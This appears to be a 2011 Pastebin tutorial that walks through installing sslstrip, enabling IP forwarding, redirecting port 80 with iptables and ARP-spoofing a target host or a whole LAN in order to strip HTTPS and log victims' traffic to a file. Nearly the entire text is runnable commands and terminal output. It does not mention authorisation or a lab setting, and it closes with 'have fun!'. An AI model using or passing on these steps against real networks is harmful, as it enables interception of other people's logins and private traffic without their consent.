Want more features on Pastebin? Sign Up, it's FREE!

Setting up sslstrip for man in the middle attacks

By: itnetsec on Dec 5th, 2011  |  syntax: None  |  size: 9.40 KB  |  views: 158  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. This tutorial will show you how to setup sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
  2.  
  3. Aren't you excited?!
  4.  
  5. Open a terminal window
  6.  
  7. Download sslstrip from:
  8. http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
  9.  
  10. With this command:
  11. wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
  12.  
  13. #BEGIN TERMINAL OUTPUT
  14. root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
  15. --2011-12-05 01:35:11--  http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
  16. Resolving www.thoughtcrime.org... 72.14.190.145
  17. Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
  18. HTTP request sent, awaiting response... 200 OK
  19. Length: 22198 (22K) [application/x-gzip]
  20. Saving to: `sslstrip-0.9.tar.gz'
  21.  
  22. 100%[====================================================================================>] 22,198      --.-K/s   in 0.07s  
  23.  
  24. 2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
  25. #END TERMINAL OUTPUT
  26.  
  27. Extract the package "sslstrip-0.9.tar.gz" with the following command:
  28. tar -zxvf sslstrip-0.9.tar.gz
  29.  
  30. #BEGIN TERMINAL OUTPUT
  31. root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
  32. sslstrip-0.9/
  33. sslstrip-0.9/README
  34. sslstrip-0.9/COPYING
  35. sslstrip-0.9/setup.py
  36. sslstrip-0.9/sslstrip/
  37. sslstrip-0.9/sslstrip/StrippingProxy.py
  38. sslstrip-0.9/sslstrip/SSLServerConnection.py
  39. sslstrip-0.9/sslstrip/ServerConnectionFactory.py
  40. sslstrip-0.9/sslstrip/ClientRequest.py
  41. sslstrip-0.9/sslstrip/ServerConnection.py
  42. sslstrip-0.9/sslstrip/CookieCleaner.py
  43. sslstrip-0.9/sslstrip/__init__.py
  44. sslstrip-0.9/sslstrip/DnsCache.py
  45. sslstrip-0.9/sslstrip/URLMonitor.py
  46. sslstrip-0.9/lock.ico
  47. sslstrip-0.9/sslstrip.py
  48. #END TERMINAL OUTPUT
  49.  
  50. You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
  51. Install them like this:
  52. apt-get install python python-twisted-web
  53.  
  54.  
  55. In my case they were already installed:
  56.  
  57. #BEGIN TERMINAL OUTPUT
  58. root@bt:~# apt-get install python python-twisted-web
  59. Reading package lists... Done
  60. Building dependency tree      
  61. Reading state information... Done
  62. python is already the newest version.
  63. python-twisted-web is already the newest version.
  64. 0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
  65. #END TERMINAL OUTPUT
  66.  
  67.  
  68. Now change to the "sslstrip-0.9" directory:
  69. cd sslstrip-0.9
  70.  
  71. #BEGIN TERMINAL OUTPUT
  72. root@bt:~# cd sslstrip-0.9
  73. root@bt:~/sslstrip-0.9# ls
  74. COPYING  lock.ico  README  setup.py  sslstrip  sslstrip.py
  75. #END TERMINAL OUTPUT
  76.  
  77. Run the command:
  78. python ./setup.py install
  79.  
  80. #BEGIN TERMINAL OUTPUT
  81. root@bt:~/sslstrip-0.9# python ./setup.py install
  82. running install
  83. running build
  84. running build_py
  85. creating build
  86. creating build/lib.linux-x86_64-2.6
  87. creating build/lib.linux-x86_64-2.6/sslstrip
  88. copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
  89. copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
  90. copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
  91. copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
  92. copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
  93. copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
  94. copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
  95. copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
  96. copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
  97. running build_scripts
  98. creating build/scripts-2.6
  99. copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
  100. changing mode of build/scripts-2.6/sslstrip from 644 to 755
  101. running install_lib
  102. creating /usr/local/lib/python2.6/dist-packages/sslstrip
  103. copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  104. copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  105. copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  106. copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  107. copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  108. copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  109. copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  110. copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  111. copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
  112. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
  113. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
  114. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
  115. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
  116. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
  117. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
  118. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
  119. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
  120. byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
  121. running install_scripts
  122. copying build/scripts-2.6/sslstrip -> /usr/local/bin
  123. changing mode of /usr/local/bin/sslstrip to 755
  124. running install_data
  125. creating /usr/local/share/sslstrip
  126. copying README -> /usr/local/share/sslstrip
  127. copying COPYING -> /usr/local/share/sslstrip
  128. copying lock.ico -> /usr/local/share/sslstrip
  129. running install_egg_info
  130. Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
  131. Cleaning up...
  132. #END TERMINAL OUTPUT
  133.  
  134.  
  135. Now we need to turn on IP forwarding, run this command:
  136. echo "1" > /proc/sys/net/ipv4/ip_forward
  137.  
  138.  
  139. Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
  140. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  141.  
  142. Change the <listenPort> above to an ephemeral port.  Something like 30000 should do.
  143. So it should look like this:
  144. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
  145.  
  146.  
  147. Now we are going to execute sslstrip, run this command:
  148. sslstrip -a -l 30000 -w secret.log
  149.  
  150. The listening port will be whatever you chose for iptables to redirect HTTP traffic too.
  151.  
  152. #BEGIN TERMINAL OUTPUT
  153. root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
  154.  
  155. sslstrip 0.9 by Moxie Marlinspike running...
  156. #END TERMINAL OUTPUT
  157.  
  158. Notice above in the terminal output. Don't kill the terminal session.  sslstrip is running!
  159.  
  160. Open a new terminal window.
  161.  
  162. Now we need to setup arpspoof so the network will think you are the gateway or router.  This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
  163. arpspoof -i <interface> -t <targetIP> <gatewayIP>
  164.  
  165. If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the networks real gateway/router, this is the traffic we want to hijack.
  166. If you want arpspoof to intercept traffic across the whole LAN run:
  167. arpspoof -i <interface> <gatewayIP>
  168.  
  169. So, I would run the command like this:
  170. arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
  171.  
  172. #BEGIN TERMINAL OUTPUT
  173. root@bt:~# arpspoof -i eth0 10.10.1.254
  174. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  175. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  176. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  177. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  178. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  179. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  180. 0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
  181. #END TERMINAL OUTPUT
  182.  
  183. Notice above in the terminal output, you will constantly receive arp replies, just let it run.  Don't kill the terminal session.
  184.  
  185. If you need additional help just run:
  186. sslstrip --help
  187.  
  188. #BEGIN TERMINAL OUTPUT
  189. root@bt:~/sslstrip-0.9# sslstrip --help
  190.  
  191. sslstrip 0.9 by Moxie Marlinspike
  192. Usage: sslstrip <options>
  193.  
  194. Options:
  195. -w <filename>, --write=<filename> Specify file to log to (optional).
  196. -p , --post                       Log only SSL POSTs. (default)
  197. -s , --ssl                        Log all SSL traffic to and from server.
  198. -a , --all                        Log all SSL and HTTP traffic to and from server.
  199. -l <port>, --listen=<port>        Port to listen on (default 10000).
  200. -f , --favicon                    Substitute a lock favicon on secure requests.
  201. -k , --killsessions               Kill sessions in progress.
  202. -h                                Print this help message.
  203. #END TERMINAL OUTPUT
  204.  
  205.  
  206. That's it...have fun!
  207.  
clone this paste RAW Paste Data